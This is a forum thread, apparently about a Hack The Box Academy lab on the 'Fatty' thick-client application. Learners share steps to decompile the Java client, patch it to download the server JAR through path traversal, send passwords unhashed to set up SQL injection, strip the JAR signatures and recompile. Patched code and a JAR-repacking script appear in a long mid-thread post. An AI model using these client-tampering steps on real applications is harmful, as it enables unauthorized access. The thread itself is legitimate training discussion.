Exploiting Web Vulnerabilities in Thick-Client Applications

Could you give me some insight on the steps to rebuild the JAR file? I was able to figure out how to download the fatty-server.jar, however I don't really understand how I did it. I think the module doesn't do a good job of explaining the exact steps.
Thank you.

There's a reply by @hx1 above that explains how to do it. Just follow those steps.
Basically it is: modify the code as my reply (for the User file) and the Academy (for the ClientGUI file) say, compile and move the .class files as @hx1 said, and then try.
So, basically, for every .java file you have modified, you have to generate .class files for that code and move them into their respective raw directory.

I downloaded the Fatty-Client.jar, but when I try to decompile it, it does not work. If I try to run it, it says it's corrupted, and when I do 'ls' I get this:

-a---- 5/29/2023 11:24 AM 68 fatty-server.jar

This shows the full file was not downloaded... any idea why?

Why do you need to download the fatty-server.jar? I'm confused here.
I tried doing everything in the remote RDP session...
I changed the port to 1337, removed the hashes, deleted the 1.RSA and 1.SF files, added the correct IP address to /hosts and then recompiled it...
But it still doesn't log me in... I don't know what I'm doing wrong, actually.
Please, I will need some help.

1 Like

Apparently you need to download it for the SQL injection, as someone mentioned here. But I will try to do the injection without downloading...

Just make sure you are following the steps mentioned in the module very closely... this is one of those questions where one wrong move and you can't tell why it's not working.

P.S. Make sure that in the Manifest file you have the extra empty line after deleting the hashes.

1 Like

I finally logged in but... I can't find the open button... I wonder if it's hidden.
Can't tell... any idea, please?

UPDATE: I got it... just needed to expand the app frame.

1 Like

The section seems to be poorly written, as I noticed a typo in one of the commands... as someone mentioned here, there is a walkthrough on this machine by ippsec on YouTube and it is a 2 hr+ long video... HTB should not have placed this exercise casually in the middle of the module.

8 Likes

Yeah! I noticed it and reported it.

This is good advice. The other day I was able to log in with qtc and today I have just been getting connection issues. Might be because I did some things slightly out of order. I'll follow exactly what they do and hopefully it goes better tomorrow.

This is sort of a nightmare. I don't want to sift through a 2 hour ippsec video to do this. Literally running the commands from the lecture does not work. I'm trying to compile the ClientGuiTest.java file per the instructions and it's throwing 31 errors because it can't find symbols. How do I fix it? No idea.

EDIT:

Okay, I figured out why this wasn't compiling. In javac -cp fatty-client-new.jar ... you have to be referencing the existing jar. It wasn't clear from the instructions that it was pulling the symbols and such from the existing jar file. I didn't realize that was how the command worked, and it would have been nice to know. Regardless, either be in the directory of the existing fatty-client-new.jar or put the path to it.

EDIT2:

Finished it. Really a difficult exercise without enough depth on process. To anyone else with problems, I recommend checking out this walkthrough which is more in depth on what is actually happening with the code.

5 Likes

This is really a nightmare. Probably for me only; the explanation is not very clear. The instructions were difficult to follow.

I hope they can also provide some screenshots to help, so that it is easier for noobs like me. Almost every time I have to come to the forum and look for guidance or clearer explanations.

2 Likes

I spent more time solving this than the entire 3 skill checks at the end of this module combined…

To anyone having issues compiling the User.java file like I did, try using javac -cp . C:\TOOLS\fatty-server.jar.src\htb\fatty\shared\resources\*.java to force both User.java and the other .java file in that directory to compile at the same time. This was the only way I could get it to work.

A poorly explained module, with commands that didn’t work, compounded the difficulty of an already challenging module by orders of magnitude.

2 Likes

Hello guys...
Very badly written tutorial... and I ended up in a mess of warnings initially... can someone please help? The help already written is also for someone who is good in Java...

2 Likes

At last my programming skills helped me handle the lengthy tutorial... there are ways to teach it... no need to write such a lengthy tutorial where the point of focus disappeared somewhere...

Hey all, I've gotten to the SQL injection part of this module. The odd thing is that I get the server file and when I decompile it, it's not like anything is missing when I look at it in JD-GUI. It just won't pull up the login screen for me to do anything, so I can't finish this out. Any suggestions? Seems like a technical issue.

I'm also getting these errors when I try to open it from the command line instead.

What am i doing wrong here?

The fatty-server.jar is just for you to analyze and identify the SQLi; you don't need to run it. To exploit the SQLi, you need to change the fatty-client.jar.

For everyone having problems, since not all of us have the same "experience" on the matter of how to compile and such.

The beginning is fairly straight forward so I’ll start to explain my steps from the modification of the “Invoker.java”.

/* Beginning of Invoker.java code */
/*     */ package htb.fatty.client.methods;
/*     */ 
/* redacted code */
/*     */ import java.util.Base64;
/*     */ import java.io.File;
/*     */ import java.io.FileOutputStream; /* This is the beginning of the file, where all the libraries are imported; this import is the line we need to add */
/* redacted code */

Going further down, we stop at line "122" and modify the "public String open" function, removing what is not necessary and adding our new lines of code:

/* redacted code */
/*     */   public String open(String foldername, String filename) throws MessageParseException, MessageBuildException, IOException {
/* 123 */     String methodName = (new Object() {  }).getClass().getEnclosingMethod().getName();
/* 124 */     logger.logInfo("[+] Method '" + methodName + "' was called by user '" + this.user.getUsername() + "'.");
/* 125 */     if (AccessCheck.checkAccess(methodName, this.user)) {
/* 126 */       return "Error: Method '" + methodName + "' is not allowed for this user account";
/*     */     }
/*     */     
/* 129 */     this.action = new ActionMessage(this.sessionID, "open");
/* 130 */     this.action.addArgument(foldername);
/* 131 */     this.action.addArgument(filename);
/* 132 */     sendAndRecv();
/* 133 */     if (this.response.hasError()) {
/* 134 */       return "Error: Your action caused an error on the application server!";
/*     */     }
/*     */     
/*     */     /* These are the lines we need to add: instead of returning the file content as a String, */
/*     */     /* write the raw bytes of the server response to disk. The stream is opened only after the */
/*     */     /* error check, and try-with-resources closes it even if write() throws. */
/*     */     String desktopPath = System.getProperty("user.home") + "\\Desktop\\fatty-server.jar";
/*     */     byte[] content = this.response.getContent();
/*     */     try (FileOutputStream fos = new FileOutputStream(desktopPath)) {
/*     */       fos.write(content);
/*     */     }
/*     */     return "Successfully saved the file to " + desktopPath;
/*     */   }
/* redacted code */

Once the code has been modified time to compile it.

PS C:\> javac -cp fatty-client-new.jar fatty-client-new.jar.src/htb/fatty/client/methods/Invoker.java
PS C:\> mv -Force fatty-client-new.jar.src/htb/fatty/client/methods/*.class raw/htb/fatty/client/methods/
PS C:\> cd raw
PS C:\raw> jar -cmf META-INF\MANIFEST.MF traverse.jar .

When the above is done, open the ".jar" application just compiled and download the "fatty-server.jar".
(Hopefully everything goes as planned, eheh)

Now, time to jump straight to the “User.java” code in order to modify the “public User” function.

/* redacted code */
/*     */   public User(int uid, String username, String password, String email, Role role) {
/*  20 */     this.uid = uid;
/*  21 */     this.username = username;
/*     */     this.password = password; /* this is the only line you need to add, the rest can be simply removed */
/*  33 */     this.email = email;
/*  34 */     this.role = role;
/*     */   }
/* redacted code */

Going down a bit, we have to modify another function, "public void setPassword".

/* redacted code */
/*     */   public void setPassword(String password) {
/*     */     this.password = password; /* store the password as given, without the original hashing */
/*     */   }
/* redacted code */

Time to recompile everything one more time.

PS C:\> javac -cp fatty-client-new.jar fatty-client-new.jar.src\htb\fatty\shared\resources\User.java
PS C:\> mv -Force fatty-client-new.jar.src/htb/fatty/client/methods/*.class raw/htb/fatty/client/methods/
PS C:\> cd raw
PS C:\raw> jar -cmf META-INF\MANIFEST.MF traverse.jar .

That’s it! Read the rest of the section module carefully and you should be able to complete it.

PS: As asdfer2 suggested, there may be something wrong in the last block of code, so read his comment. When I have time I'll double-check it.

2 Likes
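The repack stage of the steps above, together with the caveat raised earlier in the thread (delete 1.RSA and 1.SF, remove the per-entry hashes from MANIFEST.MF and keep the trailing empty line), can also be done by rewriting the archive directly instead of the mv / jar -cmf sequence. The script below is an added example and is not code from the HTB module or from the Fatty application. It assumes the replacement .class was already produced with javac -cp against the original jar, as the post describes; the "signed" jar it builds inline is constructed for the demonstration only (the htb/fatty/... entry names follow the layout quoted in the thread, and the digest value and .RSA bytes are placeholders).

```python
"""Unsign a JAR and drop recompiled classes back in (constructed example).

Added illustration for this thread, not the module's or Fatty's own code.
A signed JAR carries META-INF/<name>.SF plus a .RSA/.DSA/.EC signature block
and one 'Name: ... / SHA-256-Digest: ...' section per entry in MANIFEST.MF.
Any of those left behind after a class is replaced makes the JVM reject the
archive with a SecurityException, so all of them have to go.
"""
import io
import zipfile

SIG_SUFFIXES = (".SF", ".RSA", ".DSA", ".EC")


def is_signature_file(name: str) -> bool:
    """True for META-INF/<name>.SF / .RSA / .DSA / .EC (the signature files)."""
    rest = name[len("META-INF/"):]
    return name.startswith("META-INF/") and "/" not in rest and rest.upper().endswith(SIG_SUFFIXES)


def strip_manifest(manifest_text: str) -> str:
    """Keep only the main section of MANIFEST.MF and end it with a blank line.

    Manifest sections are separated by blank lines: the first one holds
    Manifest-Version / Main-Class, every later one is a per-entry digest that
    no longer matches once a class is replaced. The final empty line is the
    one the thread warns about; without it the manifest is not parsed fully.
    """
    main_section = manifest_text.replace("\r\n", "\n").split("\n\n", 1)[0]
    lines = [ln for ln in main_section.split("\n") if ln.strip()]
    return "\n".join(lines) + "\n\n"


def repack_jar(original: bytes, replacements: dict) -> bytes:
    """Return a new, unsigned JAR with the given entries overwritten.

    `replacements` maps an entry name such as
    'htb/fatty/client/methods/Invoker.class' to the bytes javac produced.
    """
    out = io.BytesIO()
    with zipfile.ZipFile(io.BytesIO(original)) as src, \
         zipfile.ZipFile(out, "w", zipfile.ZIP_DEFLATED) as dst:
        for info in src.infolist():
            name = info.filename
            if is_signature_file(name):
                continue                      # drop 1.SF / 1.RSA and friends
            if name == "META-INF/MANIFEST.MF":
                data = strip_manifest(src.read(info).decode("utf-8")).encode("utf-8")
            elif name in replacements:
                data = replacements[name]     # the recompiled class
            else:
                data = src.read(info)
            dst.writestr(name, data)
        for name, data in replacements.items():
            if name not in src.namelist():    # brand-new classes are appended
                dst.writestr(name, data)
    return out.getvalue()


def jar_entries(jar: bytes) -> list:
    with zipfile.ZipFile(io.BytesIO(jar)) as z:
        return z.namelist()


def read_entry(jar: bytes, name: str) -> bytes:
    with zipfile.ZipFile(io.BytesIO(jar)) as z:
        return z.read(name)


def build_signed_sample() -> bytes:
    """Constructed stand-in for a signed client jar; NOT the real fatty-client.jar."""
    manifest = (
        "Manifest-Version: 1.0\r\n"
        "Main-Class: htb.fatty.client.gui.ClientGuiTest\r\n"
        "\r\n"
        "Name: htb/fatty/client/methods/Invoker.class\r\n"
        "SHA-256-Digest: AAAA\r\n"            # placeholder digest
        "\r\n"
    )
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        z.writestr("META-INF/MANIFEST.MF", manifest)
        z.writestr("META-INF/1.SF", "Signature-Version: 1.0\r\n")
        z.writestr("META-INF/1.RSA", b"\x30\x82")   # placeholder PKCS#7 bytes
        z.writestr("htb/fatty/client/methods/Invoker.class", b"\xca\xfe\xba\xbe original")
        z.writestr("htb/fatty/shared/resources/User.class", b"\xca\xfe\xba\xbe user")
    return buf.getvalue()


if __name__ == "__main__":
    new_class = b"\xca\xfe\xba\xbe patched"   # stands in for the javac output
    patched = repack_jar(build_signed_sample(),
                         {"htb/fatty/client/methods/Invoker.class": new_class})
    print(jar_entries(patched))
    print(read_entry(patched, "META-INF/MANIFEST.MF").decode())
```

To use it on the real archive, read fatty-client-new.jar into `original`, map each entry name to the .class file javac wrote next to the .java source, and write the returned bytes out as traverse.jar; the JVM then loads it as an ordinary unsigned jar, which is exactly what the manual steps (delete 1.RSA/1.SF, edit the manifest, jar -cmf) produce.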

Hi. There is an error in your code (the last block). The User.java part creates the class file inside the shared\resources\ folder. Currently you're advising copying it to the client/methods/ folder, which is incorrect. Other than that, this post helped a lot. Didn't feel like a spoiler, more like in-depth instructions where the HTB guide lacked.

This is what worked for me:

mv -Force fatty-client-new.jar.src/htb/fatty/shared/resources/*.class raw/htb/fatty/shared/resources/

2 Likes

Thanks for this post! It was exactly what I was looking for. I needed someone to break down the steps like this. The Academy module assumes you know how to recompile each time, and I just don't have the technical background for that yet. People in the Discord chat were recommending watching Ippsec's 2 hour video, but I just don't have the patience for that.

Thanks also to Asdfer2 for catching the error in the last post!

2 Likes